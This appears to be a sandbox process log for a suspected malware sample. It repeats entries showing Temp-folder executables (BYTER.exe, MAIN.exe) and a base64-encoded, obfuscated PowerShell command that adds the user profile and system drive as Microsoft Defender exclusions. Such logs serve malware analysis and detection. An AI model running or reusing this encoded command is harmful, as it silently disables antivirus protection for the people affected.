"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1784115463-2000515224-1938884843-885390482-930745074148145954-8149088231980488001"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAbABxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAbABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGIAaABqACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AZAB2ACMAPgA="

C:\Users\Admin\AppData\Local\Temp\BYTER.exe

"C:\Users\Admin\AppData\Local\Temp\BYTER.exe"

C:\Users\Admin\AppData\Local\Temp\MAIN.exe

"C:\Users\Admin\AppData\Local\Temp\MAIN.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

